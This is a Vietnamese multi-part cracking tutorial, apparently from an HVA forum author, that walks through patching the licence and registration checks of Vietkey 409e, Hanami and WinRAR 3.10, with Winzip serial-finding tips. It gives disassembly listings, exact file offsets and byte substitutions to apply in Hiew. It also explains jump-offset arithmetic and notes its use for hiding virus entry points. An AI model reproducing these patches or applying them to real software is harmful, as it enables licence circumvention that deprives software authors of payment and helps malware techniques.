Ví dụ: VớI phần mềm Winzip ver 8.0 bạn có thể dùng SoftIce tìm đến dòng 00407AA3 LEA EAX,[EBP-0140] , sau đó đánh vào D EBP-0140 là tìm được số serial tương ứng vớI user name nhập vào…Nhưng vớI Winzip 8.1 , nếu bạn áp dụng y chang như cách đốI vớI Winzip 8.0 sẽ chẳng được gì…Do đó bạn hãy dùng chính cái đầu của mình hơn là áp dụng một cách máy móc như con vẹt nhưng cái đã học

II. Cài Đặt

Hầu hết (khoảng 70%) phần mềm đều cài đặt xong rồI ta mớI crack…(Tuy nhiên có những phần mềm bắt nhập license khi setup như Window, Photoshop Visual Studio…thì ta sẽ bàn sau). Sau khi cài đặt xong bạn hãy chạy soft cần crack sau đó ghi nhớ thông báo bắt đăng ký hay nhập license code, user code v.v.

III. Unpack

Một số soft được tác giả nén lạI, vì sợ crack…ke ke ke, đơn cử như Vietkey 2000 . Bạn phải xem coi chương trình có được nén(pack) lại hay không. Nén ở đây không có nghĩa là được nén bằng WinZip hay WinRAR mà file .EXE được nén nhỏ lại mà vẫn có thể chạy được bình thường không cần giải nén. Để biết file có bị nén hay không, bạn phải xem mở file .EXE đó ra để xem đoạn mã của nó. Ở đây tôi dùng WinNC, chọn file cần xem và nhấn F3. Thông thường, nếu file đã bị nén thì nó sẽ có 1 dòng đặc trưng trong file bị nén ở đầu file. Chẳng hạn như được nén bằng ASPack thì (thường) trong file sẽ có chuỗi "aspack". Nén bằng UPX thì sẽ có dòng "UPX...". Còn đối với shrink thì có chữ "shrink". Tuy nhiên, cũng có một vài công cụ giúp ta giải nén (unpack) mà không cần biết file được nén theo dạng nào, đó là nó tự động nhận dạng. Tuy nhiên, nếu dạng được nén không được hỗ trợ thì nó cũng đành bó tay. Tiêu biểu cho loại này là ProcDump32, nó hỗ trợ khá nhiều dạng phổ biến như ASPack, Code Safe 3.X, PC Guard 2.10, PE Compact, PKLITE... bạn có thể chọn "*unknown*" để chương trình tự động nhận dạng.
Ngoài ra, có thể chương trình còn được bảo vệ bởi 1 đoạn mã bảo vệ (Security Code). Đây là một đoạn mã dùng để bảo vệ chương trình tránh bị debug (anti-debug) hay thay đổi kích thước. Đối với loại này, chúng ta cũng có một số chương trình để bỏ phần Security Code đó, có thể kể ra là : Anti Crypt, UnCode Crypt, tEunlock...

IV. Bắt tay vào crack

*.Bước 1: sau khi chạy chương trình bạn hãy ghi nhận lạI những thông báo bắt đăng ký đạI loạI như “Enter Registration Code”, Register, evalution copy, unregistered version…v.v và v.v

*.Bước 2: Nhấn vào và nhập vào đạI một số Serial/Unlock Code/Registration Code bất kỳ…Sau đó nó sẽ hiện lên một nag báo rằng chúng ta đã nhập sai, yêu cầu nhập lại…Không sao, hãy ghi lạI dòng thông báo mà bạn nhận được khi nhập sai như : “Incorrect Password...", "Wrong Serial...", "Re-enter password ... "

*.Bước 3:

Chạy W32Dasm, chọn "Open file to Disassembler..." hay nhấn trên thanh công cụ cũng được.
_ Chọn file cần Crack.
_ Trên menu Refs, chọn String Data References. Tại sao ta phải làm như vậy, bạn hãy xem đoạn mã sau :

Nếu "Serial bạn gõ vào" = "Serial chương trình" thì <---- Ta sẽ Patch chỗ này Nhảy đến đăng ký bản quyền Còn không Nhảy đến bảng thông báo "Incorrect password..." <------- Bạn cần ở đây trong W32Dasm Bây giờ, nếu nó kêu là sai thì mình cho nó thành đúng : Nếu "Serial bạn gõ vào" <> "Serial chương trình" thì <----- Chỗ đã được patch Nhảy đến đăng ký bản quyền Còn không Nhảy đến bảng thông báo "Incorrect password..." <-------- Bạn cần ở đây trong W32Dasm Còn bây giờ bạn cần biết một chút về assembler (vì chương trình sẽ được W32Dasm dịch ra assembler mà Viết lại trong assembler đoạn code trên sẽ tương tự như : cmp eax, eax <----- So sánh số serial/unlock code... jne [Địa chỉ 1] <----- Nhảy đến thông báo số đăng ký đúng hoặc sai call [Địa chỉ 2] <----- Nhảy đến thông báo ngược lại Bây giờ, giả sử [Địa chỉ 1] là nhảy đến thông báo đã được đăng ký và [Địa chỉ 2] nhảy đến thông báo "Incorrect password..." thì ta sẽ phải sửa lại đoạn code như sau : cmp eax, eax je [Địa chỉ 1] <------ Chỗ đã được Patch call [Địa chỉ 2] Trong assembler, câu lệnh nhảy được biết đến là : je = Jump if equal : Nhảy nếu bằng jne = Jump if not equal : Nhảy nếu không bằng Vì vậy, thông thường "je" được đổi thành "jne" và ngược lại. Trở lại với chương trình của chúng ta, đi tìm chuỗi "Incorrect password..." là chúng ta đã đến bảng thông báo "Incorrect password...". Kiếm bằng cách vào menu Refs/String data references của W32Dasm, tìm chuỗi "Incorrect password..." và nhấn kép vào nó (hy vọng là có . Lúc này, W32Dasm đưa chúng ta đến bảng thông báo chưa đăng ký rồi, nhiệm vụ của chúng ta là phải kiếm được nơi có chứa lệnh nhảy đến bảng thông báo này. Hãy dời con trỏ lên cho tới khi nào kiếm thấy dòng "je ..." hay "jne..." thì dừng lại ở đó. Còn nếu thấy dòng :

* Reference ....
:000... <---- để ý địa chỉ này thì hãy dừng lại đó vì bảng thông báo đã được gọi từ 1 địa chỉ khác, nhấn Shift-F12 (hay vào menu Goto/Goto Code Location), nhập vào dãy số000... sau dòng "* Reference..." rồi Enter. Lặp lại các bước dò như trên cho đến khi nào thấy được dòng "je..." hay "jne..." Cuối cùng, khi đã kiếm được rồi thì hãy nhìn xuống thanh status bar, bạn sẽ thấy 1 chuỗi số ngay sau "@Offset ...00...". Nhớ lấy chuỗi số đó, và đừng quên là bỏ chữ "h" cuối cùng đi, vì đây là chữ biểu hiện cho số HEX. *.Bước 4: Đóng W32Dasm lại. Mở HView ra, nhấn F4, chọn Decode, nhấn F5, đánh vào giá trị00... bạn thu được ở "@Offset...00..." lúc nãy và Enter, HView đưa bạn đến ngay đúng dòng bạn nhìn thấy trong W32Dasm và còn chờ gì nữa, patch nó đi. Nhấn F3, rồi F2 (tôi chọn cách này để giúp Newbie dễ hiểu hơn vì đôi lúc không phải lúc nào giá trị cũng là 74 và 75). Sửa "jne..." thành "je..." và "je..." thành "jne..." _ Cuối cùng, nhấn F9 để Save chương trình và F10 để thoát, bạn chạy lại chương trình và nhập số đăng ký bất kỳ thử xem sao, nếu may mắn, bạn sẽ nhận được thông báo "Thanks for ..." , hehe, và đừng quên lưu 1 bản .EXE để đề phòng sự cố trước khi Patch .

Mẹo : Nếu không tìm thấy dòng "Incorrect password..." thì bạn thử đi ngược lại là đi từ dòng "Thanks for..." hay "Registered..." xem .
Đây là cách đơn giản nhất để Patch chương trình, ngoài ra còn có thể dùng SoftICE, VBDe, DeDe, SmartCheck... cái đó để hỗ trợ crack soft là tùy ở bạn . Bạn có thể nâng cao "tay nghề" bằng cách viết keygen hoặc bằng 1 số thủ thuật khác như "spy memory" .

Chú ý : Ngoài hai câu lệnh ASM cơ bản bạn nên biết một số câu lệnh khác như : Call, Popad, Test, Nop ( bạn có thể tham khảo trong phần phụ lục của tôi)

V. Bài tập crack đầu tiên cho bạn

Để minh hoạ cho phần lý thuyết trên chúng ta hãy tập crack một phần mềm khá quen thuộc với người Việt Nam, đó là bộ gõ Vietkey...Trên thị trường hiện nay đã có bản Vietkey build 11220, nhưng bản đó được pack lại bằng UPX, detect Si nên tôi không hướng dẫn các bạn crack nó, mà chúng ta hãy tập crack phiên bản Vietkey409e...Các bản Vietkey409,409d đã được các anh NVH©, Nguyễn Mạnh Cường hướng dẫn, nhưng bây giờ trong tay tôi chỉ có bản Vietkey409e trong CD PHP software #1, và mặc dùng bác Phạm Hồng Phước có cho bản crack, nhưng khi mở Vietkey409e lên tôi thấy " License to Rockman", tò mò tôi thử xoá file VKNT.LIC thì lập tức hiện lên bảng thông báo bắt đăng ký với tác giả he he, vậy là tay Rockman này hắn chỉ tìm số serial cho riêng mình hắn, do đó bạn không thể đăng ký license cho mình, không biết các bạn cảm giác sao chứ tôi rất bực mình khi phải xài phần mềm do người khác crack ke ke ke...Từ đó hôm nay tôi sẽ hướng dẫn các bạn crack Vietkey409e chấp nhận mọi serial, dù cho bạn có xoá file VKNT.LIC

Công cụ : WDASM893, HIEWS602 (mới hơn càng tốt)
Phần mềm : Vietkey409e
File cần crack : VKNT.EXE
Cracker : hacnho

Đầu tiên các bạn chạy Vietkey409e, tức thì một loạt nag hiện ra đập liên tiếp vào mặt bạn " Vietkey chua dang ky su dung, lien he tac gia", sau một hồi bắn ra một loạt nag, nó hiện ra một dòng chữ " Unregistered Version" trên thanh tiêu đề của Vietkey409e...Sau đó bạn đánh dấu kiểm vào check box " Đăng Ký Sử Dụng" or " Registration", vào đó nhập vào User Nam, và License Code, enter, oh la la, một nag bắn ra " Invalid Number", Bạn ghi nhớ lấy nó...

Okie, sau khi tắt Vietkey409e bạn dùng WDASM mở file VKNT.EXE trong thư mục cài đặt. chờ cho WDASM disassembly xong bạn bắt đầu vào menu menu Refs, chọn String Data References, kiếm cho ra dòng có chữ " Invalid Number", double click vào nó, đóng cửa sổ String Data References lại, lúc này bạn sẽ thấy như sau :

*. Reference To: USER32. GetDlgItemTextA, Ord : 00EDh
|
:00403000 FFF15D4934000 Call dword ptr [004093D4]
:00403006 8D4DCC lea ecx, dword ptr [ebp-34]
:00403009 51 pussh ecx
:0040300A 56 push esi

*. Reference To: KERNEL32.lstrcmpA, Ord : 00269h
|
:0040300B FF15C8924000 Call dword ptr [004092C8] =>Gọi hàm kiểm tra License Code
:00403011 85C0 test eax, eax ==> kiểm tra License Code
:00403013 743D je 00403052 ==>Nếu nhập đúng, nhảy đến thông báo " License to.."
:00403015 833D1877400000 cmp dword ptr [00407718], 00000000

*. Possible StringData Ref from Data Obj ->"Go"

:0040301C B8187C4000 mov eax, 00407C18
:00403021 7505 jne 00403028 ==> Sai, nhảy đến thông báo "Invalid Number"

*. Possible StringData Ref from Data Obj ->"Invalid Number"

:00403023 B89C704000 mov eax,00407C9C

Oh yeah, chúng ta đã tìm ra chỗ cần crack rồi phải không các bạn, chúng ta chỉ cần đổi 2 chỗ, --một là ( :00403013 743D je 00403052 ==>Nếu nhập đúng, nhảy đến thông báo License to " ) ==> Cái mà ta cần crack ở đây là, dù cho ta nhập vào số serial gì nó cũng chịu và hiện ra bảng Lincense to...
--hai là, chúng ta không cho hiện ra bảng " Invalid number" đồng nghĩa với chuyện bảng thông báo " Liên hệ tác giả" cũng không hiện ra luôn he he (:00403021 7505 jne 00403028 ==> Sai, nhảy đến thông báo "Invalid Number")

Ở đây chúng ta cần đổi hai bytes:

1. bytes thứ nhất chúng ta đổi câu lệnh nhảy ngược lại tức là từ je ( nhảy nếu bằng) thành jne (nhảy nếu không bằng)...các bạn di chuyển vệt sáng đến dòng :00403013 743D je 00403052, nhìn xuống dưới thanh task bar của WDASM bạn thấy một địa chỉ offset 0002413 (bỏ chữ h đi nhé), nhớ lấy nó...Mở HIEWS ra, tìm đến file VNTK.EXE (thường là ở ổ C, alt+F1 để chuyển ổ đĩa), nhấn F5, gõ vào 0002413 , nhấn F3, đổi 74 thành 75. Nhấn F9 để lưu, F10 để thoát

2. bytes thứ hai chúng ta đổi câu lệnh nhảy ngược lại tức là từ jne ( nhảy nếu không bằng) thành je (nhảy nếu bằng)...các bạn di chuyển vệt sáng đến dòng 00403021 7505 jne 00403028, nhìn xuống dưới thanh task bar của WDASM bạn thấy một địa chỉ offset 0002421 (bỏ chữ h đi nhé), nhớ lấy nó...Mở HIEWS ra, tìm đến file VNTK.EXE (thường là ở ổ C, alt+F1 để chuyển ổ đĩa), nhấn F5, gõ vào 0002421 , nhấn F3, đổi 75 thành 74. Nhấn F9 để lưu, F10 để thoát...

bây giờ mở lại Vietkey, đăng ký, hay xoá file VKNT.LIC xem, bạn sẽ thích ngay mà ha ha ha,

----------------------
thật ra tôi còn một chiêu khác là đổi je thành EB nhưng không chỉ cho các bạn vì chúng ta chỉ mới học...Nếu hứng thú bạn có thể tự nghĩ ra cách để crack bản Viekey409e này, bằng SoftIce (dùng hàm getdlgitemtexta),
---------------------

Bài viết của hacnho from HVA (vui lòng để lại dòng này khi trích dẫn, thanx alot)----------------------------

Thế là chúng ta đã đi hết phần IV rồi phải không các bạn, hy vọng các bạn sẽ hiểu nhiều hơn về nghệ thuật crack, trong phần sau tôi sẽ hướng dẫn các bạn về keygen, và chúng ta sẽ học crack PC security 5.0, Chúng ta sẽ học crack xen kẽ một phần mềm Việt nam với một phần mềm nước ngoài...Và dĩ nhiên là chúng ta cũng sẽ học crack những trò game nổi tiếng như Empire, Cossack, Haft Life...

Hiện nay anh Hoàng đã đưa địa chỉ trang web của mình , các bạn hãy vào tham quan và học hỏi nhe

My Forum: http://www.class12p1.1vn.net

Phần V

Chào các bạn, đáng lẽ hôm nay tôi sẽ hướng dẫn các bạn khái niệm về keygen nhưng vì chắc các bạn cũng cũng chưa rành cách crack lắm nên tôi sẽ tiếp tục hướng dẫn các bạn cách crack một số phần mềm để cho quen dần…sau đó mớI tiếp tục nâng cao trình độ là viết keygen…-------------------

Như thường lệ chúng ta sẽ đi qua phần lý thuyết một chút. Bài viết này sẽ hướng dẫn các bạn một chút về các câu lệnh asm đơn giản

Chú ý : Trong bài viết này, phần lý thuyết tôi có tham khảo bài viết của một fan vicki
---------------------
I. Lý Thuyết

Tính offset của lệnh JMP, JX, JNX & CALL

I. Lý thuyết

1. Giới thiệu

Xin chào các bạn! Trong bài viết này tôi muốn giải thích với các bạn cách tính toán offset của các câu lệnh JUMPS và CALL. Bạn sẽ thường xuyên tính toán offset của các câu lệnh này trong reverse. Đặc biệt, hiểu được cách tính cũng giúp bạn tiếp cận với kĩ thuật làm mù điểm vào host trong virus (EPO - EntryPoint Obscrured) một cách dễ hơn!

2. Các loại câu lệnh JUMPS & CALL

Ở đây tôi chỉ mô tả sự khác biệt của các câu lệnh JUMPS & CALL mà bạn thường gặp!

a) Short Jumps: nhảy ngắn có hoặc không có điều kiện đều là 2 byte. Bạn chỉ có thể nhảy tới 127 byte hoặc nhảy lùi 128 byte với các short jumps

b) Long Jumps: nhảy dài, 6 byte cho có điều kiện hoặc 5 byte cho không điều kiện

c) Calls: 5 byte ở dạng short

* Đây là bảng mã máy mô tả sự khác biệt giữa các loại JUMPS & CALLS

Jump Description Short Op-Code Long Op-Code
call procedure call E8xxxxxxxx N/A
jmp unconditional jump EBxx E9xxxxxxxx
ja/jnbe jump if above 77xx 0F87xxxxxxxx
jae/jnb/jnc jump if above or equal 73xx 0F83xxxxxxxx
jb/jc/jnae jump if below 72xx 0F82xxxxxxxx
jbe/jna jump if below or equal 76xx 0F86xxxxxxxx
jcxz/jecxz jump if cx/ecx equals zero E3xx N/A
je/jz jump if equal/zero 74xx 0F84xxxxxxxx
jne/jnz jump if not equal/zero 75xx 0F85xxxxxxxx
jg/jnle jump if greater 7Fxx 0F8Fxxxxxxxx
jge/jnl jump if greater or equal 7Dxx 0F8Dxxxxxxxx
jl/jnge jump if less 7Cxx 0F8Cxxxxxxxx
jle/jng jump if less or equal 7Exx 0F8Exxxxxxxx
jno jump if not overflow 71xx 0F81xxxxxxxx
jnp/jpo jump if no parity/parity odd 7Bxx 0F8Bxxxxxxxx
jns jump if not signed 79xx 0F89xxxxxxxx
jo jump if overflow 70xx 0F80xxxxxxxx
jp/jpe jump if parity/parity even 7Axx 0F8Axxxxxxxx
js jump if sign 78xx 0F88xxxxxxxx

Vấn đề của chúng ta là cần tính các số xx và xxxxxxxx trong mã máy

3. Tính toán offset

* Công thức: OFFSET = địa chỉ của nơi đến - (địa chỉ nơi jumps/calls + kíck thước của câu lệnh jumps/calls)

* Ví dụ:

a) Bạn đang ở tại địa chỉ 40108E. Bạn cần đặt một lệnh nhảy đến địa chỉ 4020D0 tại địa chỉ này

:40108E JMP 4020D0

Offset = 4020D0 - [40108E + 5(E9xxxxxxxx có kích thước 5 byte)] = 103D. Mã máy sẽ là E93D100000, trong đó E9 là mã máy của JMP và 3D100000 là số xxxxxxxx mà bạn vừa tính được (0000103D viết ngược lại sẽ là 3D100000)

b) Bạn cần đặt một lệnh CALL đến địa chỉ 401184 tại địa chỉ 40218B

:40218B CALL 401184

Offset = 401184 - [40218B + 5(E8xxxxxxxx có kích thước 5 byte)] = FFFFEFF4. Mã máy sẽ là E8F4EFFFFF, trong đó E8 là mã máy của CALL và F4EFFFFF là số xxxxxxxx mà bạn vừa tính được (FFFFEFF4 viết ngược lại sẽ là F4EFFFFF)

II. Thực hành

Bạn đã dùng Notepad! Mỗi lần mở file có kích thước vượt quá 64KB, Notepad sẽ hiển thi một hộp thông báo "Lỗi: File có kích thước quá lớn. Bạn có muốn dùng WordPad để đọc file này không?" - Yes | No . Nhiệm vụ của chúng ta là patch file notepad.exe để mỗi khi mở file có kích thước lớn hơn 64KB nó sẽ không hiển thị hộp thông báo trên nữa và tự động mở file bằng WordPad cho bạn. Trước khi bắt đầu mọi việc, bạn hãy sao lưu file notepad.exe trước đề phòng sự cố! Thật ra thì cũng không cần thiết bởi bạn có thể dùng SFC(System File Checker) của Windows để restore lại file notepad.exe bất cứ lúc nào. Trong ví dụ này tôi dùng bản Notepad của Windows98SE.

1/ Chạy W32Dasm. Sau khi dism file xong, bạn vào menu Ref/String Data References, tìm dòng String Resource ID=00056: "wordpad.exe" và double click lên nó. Để xem chúng ta có gì nào?!

* Possible Reference to String Resource ID=00036: "&f"
|
:004033A5 6A24 push 00000024 ; rất quan trọng
:004033A7 A1B4504000 mov eax, dword ptr [004050B4]
:004033AC 56 push esi
:004033AD 50 push eax
:004033AE FF7508 push [ebp+08]

* Reference To: USER32.MessageBoxA, Ord:01ACh
|
:004033B1 FF15A8644000 Call dword ptr [004064A8] ; hiện messagebox
:004033B7 83F806 cmp eax, 00000006 ; đã chọn YES hay NO? (IDYES=6)
:004033BA 0F85A7000000 jne 00403467 ; NO -> thoát
:004033C0 6804010000 push 00000104 ; YES -> mở file bằng WordPad
:004033C5 8D858CFDFFFF lea eax, dword ptr [ebp+FFFFFD8C]
:004033CB 837D1001 cmp dword ptr [ebp+10], 00000001
:004033CF 1BFF sbb edi, edi
:004033D1 50 push eax
:004033D2 83C737 add edi, 00000037

* Possible Reference to String Resource ID=00056: "wordpad.exe"
|
:004033D5 6A38 push 00000038
:004033D7 FF3540554000 push dword ptr [00405540]
Chúng ta chỉ cần thay PUSH 00000024 tại địa chỉ 4033A5 thành lệnh nhảy ngắn đến địa chỉ 4033C5. Mã máy của short jump là EBxx. May mắn là kích thước của short jump này là 2 byte, đúng bằng kích thước của câu lệnh PUSH 00000024 tại địa chỉ 4033A5 (6A24)! Áp dụng công thức tính offset ở trên, xx = 4033C0(địa chỉ đến) - [4033C5(địa chỉ jump) + 2 (kích thước của short jump EBxx)] = 19. Okay, mã máy sẽ là EB19!

6A24 PUSH 00000024
EB19 JMP 004033C0

2/ Chạy Hiew và mở file notepad.exe. Nhấn F4, F5 và nhập vào ".4033A5". Nhấn F3 và thay đổi 6A24 thành EB19, sau đó bấm F9 và F10. Xong, thử chạy lại Notepad và mở một file có kíck thước lớn hơn 64KB xem sao!

-------------------------------------------------------------------------

II. Thực hành

Vì phần lý thuyết có lẽ khá phức tạp đốI vớI các bạn newbie, nên trong phần thực hành chúng ta sẽ giảI trí vớI phần một phần mềm khá nổI tiếng của hãng EURONET đó là phần mềm Hanami…Một phần mềm trang trí cho desktop…Nó làm một cây anh đào ngay trên desktop, sao đó những cách hoa đào sẽ rơi nhè nhẹ xuống thanh taskbar…Lâu lâu lạI có một cơn gió thổI qua làm nhưng cánh hoa đào cuốn theo chiều gió bay thật đẹp…

Đẹp thì có đẹp đó…Nhưng “thằng Hanami” này bắt bạn phảI đăng ký…Nếu bạn không đăng ký thì mỗI lần bạn chạy chương trình nó sẽ đập vào mặt bạn một cái nag “ Not registered…hanami is shareware….” thật bực mình…Dĩ nhiên là bạn không muốn cái nag đó hiện ra chứ gì…Đúng vậy…Nhu cầu bức thiết là chúng ta phảI crack nó…Ok Sau khi tảI về (từ site euronet), bạn cài đặt, copy một bản hanami.exe ra dự phòng, rủI làm bậy còn có cái mà backup lại…Okie chúng ta bắt đấu crack nó.

Phần mềm : Hanami (http://www.euronet.nl/~rja/Hanami/
Công cụ : Windasm, Hiew
Cracker : hacnho

Đầu tiên bạn chạy hanami, một cái nag “ Not registered…hanami is shareware….” Văng ra, bạn hãy nhớ dòng “…shareware”, click ok…Sau đó bạn vào bạn click vào nút lệnh (command button) “ Register…”, một cái nag khác văng ra bắt bạn nhập vào “ your name”, “keyword”, “Registration Code”

…He he bạn đừng tưởng bở là “ cái “ keyword” không có tác dụng nhe…Tuy phần mềm rất nhỏ nhưng tác giả lạI đặt một cơ chế tạo key phức tạp nhiêu khê…Nếu dùng SoftIce để tìm số code thì hơi lâu…Nên tôi dùng phương pháp đơn giản là patch nó

hãy nhập vào tên, keyword và Registration Code. Ở đây tôi nhập vào

Your name : hacnho
Keyword :123456
Registration Code: abcdef

Enter, oh la la một nag văng ra “ Error…The registration code entered is incorect”…Ok hãy nhớ lấy nó, bạn hãy thoát hanami.

Bây giờ chúng ta mở WDASM lên, chọn file Hanami.exe…chờ WDASM disassembly xong bạn vào menu Refs, chọn String Data References, kiếm cho ra dòng “The registration code entered”, double click vào nó hai lần…Bạn trở lạI màn hình của nhìn xem chúng ta đang ở đâu…bạn sẽ thấy như thế này:

* Possible String Ref from Data Obj -->"The registration code entered"
-->"is incorect"

:0040886C 68E8424100 push 004142E8
:00408871 8B4D08 mov ecx, dword ptr [ebp+08]
:00408874 51 push ecx

* Refenrence To: USER32.MessageBoxA, Ord :01BEh

:00408875 FF1534124100 Call dword ptr [00411234]
:0040887B EB5A jmp 004088D7

Bây giờ bạn thấy vệt sáng đang ở tại
:0040886C 68E8424100 push 004142E8
hãy dịch chuyển vệt sáng lên trên vài dòng bạn sẽ thấy như sau

*. Possible String Data Ref from Data Obj --> " "
:0040884F 68B0384100 push 004142E0
:00408854 E827140000 call 00409C80
:00408859 83C408 add esp, 00000008
:0040885C E828FEFFFF call 0040869 --> gọi thông báo đăng ký
:00408861 85C0 test eax, eax -->kiểm tra số code
:00408863 7518 jne 0040887D--> nhảy nếu sai (chổ cần crack, nhớ lấy)
:00408865 6A00 push 0000000

đưa vệt sáng đến dòng :00408863 7518 jne 0040887D, nhìn xuống thanh task bar thấy offset là : 00008863 (1)

Trở lại bảng menu Refs, chọn String Data References, bạn tìm dòng " Hanami is a shareware program", double click...Chúng ta lại ra ngoài, Bạn sẽ thấy như sau

* Possible String Ref from Data Obj -->" Hanami is a shareware program"
:004014DE 68583F4100 push 00412F58 -->bạn đang ở đây
:004014E3 A1CC584100 mov eax, đwor ptr [004158CC]
:004014E8 50 push eax

* Refenrence To: USER32.MessageBoxA, Ord :01BEh

:004014E9 FF1534124100 call dword ptr [004011234]

hãy dịch chuyển lên và dòng, bạn thấy

*. Referenced by a (U)nconditional or ©onditional Jump at Address:
|:004014B4©
|
:004014CE 833DF053410000 cmp dword ptr [0040153F0], 00000000
:0040014D5 7518 jne 004014EF --> nhảy nag "Not Registered Yet", cần crack
:004014D7 6A00 push 00000000

*.* Possible String Ref from Data Obj -->"Not Registered Yet"
:004014D9 push 00413F44

bạn hãy di chuyển vệt sáng đến dòng :0040014D5 7518 jne 004014EF, nhìn xuống task bar, thấy offset là 000014D5 (2)

***từ (1) và (2) ta có hai địa chỉ offset là 00008863 , và 000014D5, do jne nghĩa là nhảy nếu không bằng, từ là bạn nhập sai thì sẽ nhảy tới thông báo sai, do đó ta cần crack ở chổ đổi cho nó dù nhập sai thì sẽ không nhảy...vậy thì ta chỉ cần đổi jne thành je ( 75 thành 74)

Ok bây giờ bạn hãy ghi lại hai offset trên, mở Hiew, mở file hanami.exe lên

Gõ F5, nhập 00008863, gõ F3, sửa 75 thành 74, gõ F9
Gõ F5, nhập 000014D5, gõ F3, sửa 75 thành 74, gõ F9, gõ F10

Okie bây giờ bạn ở Hanami lại xem, bạn sẽ thích ngay mà ha ha ha
-----------------
bài viết của hacnho (vui lòng để lại dòng này khi bạn trích dẫn--thanx a lot)
-------------------

trong phần 6 tôi sẽ hướng dẫn các bạn dùng các công cụ crack engine như file patcher 2002, và đặc biết là crack engine của anh Lê Vũ Hoàng,
**************************************:
Phần VI

Chào các bạn hôm nay tôi sẽ hướng dẫn các bạn khái niệm về sử dụng các công cụ dùng để patch. Cụ thể là ba công cụ File Patcher 4.0 của Moose's Shareware & Emulation Valley và hai công cụ Crack engine và Patch Generator của Lê Vũ Hoàng Những khái niệm này có lẽ rất sơ sài nhưng các bạn hãy xem qua rồI từ đó khám phá ra nhiều loạI khác …

Chú ý: trong bài viết này tôi có tham khảo bài viết của anh Lê Vũ Hoàng trong phần hướng dẫn PG và CE—thanx for support
Đầu tiên chúng ta phảI crack một phầm mềm cái đã…Tôi chọn soft xấu số để trảm thủ hôm nay là Winrar 3.10 (hiện giờ đã có ver 3.20 cũng crack tương tự)…

Phần mềm :Winrar 3.10
Công cụ :WDASM 893, HIEWS 602
Cracker :hacnho

Hẳn trong các bạn ai dùng qua máy tính đều biết Winrar…một tiện ích nén vào bung nén hỗ trợ nhiều dạng file…Nhưng nó không cho xài miễn phí. Sau khi setup bạn mở Winrar ra, đầu tiên bạn thấy trên dòng Title của Winrar có chữ "evaluation copy", nhớ lấy nó…Chỉnh đồng hồ hệ thống bạn qua vài ngày, bạn sẽ thấy dòng chữ "only %d days left to buy a license", vào menu help vào about bạn thấy dòng chữ “40 day trial copy”…Tiếp tục chỉnh đồng hồ hệ thống sang 2 tháng tiếp theo, mở lạI winrar, bạn sẽ bị một cái nag “yêu cầu đăng ký” đập vào mặt…
Ok hãy nhớ lấy những điều trên…Như thường lệ chúng ta vào menu Help kiếm dòng Enter Registration Code…Oh la la không có dòng đó…Chẳng lẽ chúng ta đành chịu chết hay sao…Không đâu cứ bình tĩnh mà run

- chạy W32Dasm, mở file WinRAR.exe
- vào menu Refs/String Data References, tìm dòng "evaluation copy" và double click lên nó. Di chuyển con trỏ lên một đoạn bạn sẽ thấy đoạn lệnh sau:

...
:00445B3C 757A jne 00445BB8 (dòng này rất quan trọng) <-- bạn đang ở đây :00445B3E A17C874A00 mov eax, dword ptr [004A877C] :00445B43 83F814 cmp eax, 00000014 :00445B46 7C05 jl 00445D4B :00445B48 83F828 cmp eax, 00000028 :00445B4B 7C1D jl 00445B6A … Dòng ":00445B3C 757A jne 00445BB8 " sẽ kiểm tra WinRAR đã được đăng kí hay chưa. Nếu chưa đăng kí nó sẽ thay đổi caption thành dòng "evaluation copy"(bản dùng thử) trong phạm vi 40 ngày, ngược lại nó sẽ đổi caption thành dòng "only 'xyz' days left to buy a license"(đã quá hạn dùng thử 'xyz' ngày) nếu bạn đã xài quá 40 ngày. ở đây, chúng ta chỉ cần thay dổi jne 00445BB8 thành je 00445BB8 là WinRAR sẽ jump over 'thay đổi caption' - bạn vẫn đang đứng tại dòng ":00445B3C 757A jne 00445BB8 ", hãy để ý đến thanh trạng thái ở phía dưới: Line:125681 Pg 1429 of 3117 Code Data @:00445B3C @Offset 0004513Ch in File WinRAR.exe 0004513Ch chính là file offset, còn 00445B3C chỉ là địa chỉ ảo - Virtual Address(VA=Imagebase+RVA). Hãy ghi nhớ con số này. ----Ok bây giờ chúng ta tiếp tục xử lý đến cái nag bắt đăng ký ấy -Vào menu Refs/String Data References, tìm dòng "REMINDER" và nhắp đôi lên nó (nhớ chỉ double một lần thôi nhe, vì nó có hai đoạn code tương ứng. Di chuyển con trỏ lên một đoạn bạn sẽ thấy đoạn lệnh sau: ... * Referenced by a (U)nconditional or ©onditional Jump at Address: |:0043B57F© | :0043BAE2 833D487E4A0000 cmp dword ptr [004A7A48], 000000000 :0043BAE9 754D jne 0043BB38 (dòng này rất quan trọng) <- bạn đang ở đây :0043BAEB 803D98F1480000 cmp dword ptr [0048F198],00 :0043BAF2 7544 jne 0043BB38 ... Dòng ":0043BAE9 754D jne 0043BB38 " sẽ kiểm tra WinRAR đã được đăng kí hay chưa. Nếu chưa đăng kí nó sẽ pop một nagscreen yêu cầu bạn đăng kí, sau đó sẽ nhảy đến lệnh tiếp theo tại địa chỉ 0043BB38. ở đây, chúng ta chỉ cần thay dổi jne 0043BB38 thành jne 0043BB38 là xong! - bạn vẫn đang đứng tại dòng ":0043BAE9 754D jne 0043BB38 ", hãy để ý đến thanh trạng thái ở phía dưới: Line:170442 Pg 1221 and 1222 of 3117 Code Data @:0043BAE9 @Offset 0003B0E9h in File WinRAR.exe 0003B0E9h chính là file offset của câu lệnh jne 0043BB38. Hãy ghi nhớ con số này. Ok, còn một vấn đề nữa đó là chúng ta khi vào Help, about trong winrar thì thấy dòng 40 day trial copy, rất đáng ghét…Ok hãy vào - vào menu Refs/String Data References, tìm dòng "Registered to" và double click 1 lầm duy nhất lên nó. Di chuyển con trỏ lên một đoạn bạn sẽ thấy đoạn lệnh sau: *.Referenced to :User32.SetDlgItemtextA, Ord: 0000h :0043EBF1 E818BD0400 Call 0048A90E :0043EBF6 803DC0C71490000 cmp dword ptr [0049710C], 00 :0043EBFD 7449 je 0043EC48 (dòng này rất quan trọng) <-- bạn đang ở đây :0043EBFF BE086B4900 mov esi, 00496B08 --- Nhìn xuống task bar thấy dòng chữ sau chữ @offset là 0003E1FD, ok hãy nhớ nó ------------------------------------ Trước khi crack tôi có một đề nghị bạn hãy sao lưu một bản winrar để dành để chúng ta bước qua phần 2 ---------------------------- Ok bây giờ chúng ta mở HIEWS602 ra, các bạn mở file Winrar.exe, gõ F5, gõ 0004513C, nhấn F3, sửa 75 thành 74 gõ F5, gõ 0003B0E9, nhấn F3, sửa 75 thành 74 gõ F5, gõ 0003E1FD, nhấn F3, sửa 74 thành 75 sau đó gõ F9, F10…Bây giờ bạn hãy chạy Winrar xem, bạn sẽ thích ngay mà 